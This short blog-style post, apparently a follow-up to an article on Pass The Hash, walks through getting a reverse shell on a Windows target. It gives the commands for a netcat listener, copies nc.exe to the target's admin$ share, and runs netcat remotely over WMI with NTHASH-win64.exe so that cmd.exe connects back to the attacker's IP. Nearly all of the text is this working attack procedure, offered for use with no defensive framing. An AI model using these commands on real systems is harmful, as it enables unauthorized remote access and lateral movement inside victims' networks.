In a previous article, we have seen how to perform lateral movement thru « Pass The Hash ».
Lets imagine that there is no RDP server available on the target but you still need to get a shell on the target.
Lets use a reverse shell i.e the target will connect back to us (the attacker).
Usefull as well if the firewall on the target is allowing only outbound connections.
1.Set a shell with netcat on the attacker host
nc -L -vv -p 9000
2.Copy file to target host (remember, you are using a pth shell with proper logon details).
copy nc.exe \\target\admin$
3.Exec netcat on target host
NTHASH-win64.exe /runwmi /server:target /binary:nc attacker_ip 9000 -e cmd.exe
At this point you will get a shell popup in your listening netcat.
Try a simple whoami for fun.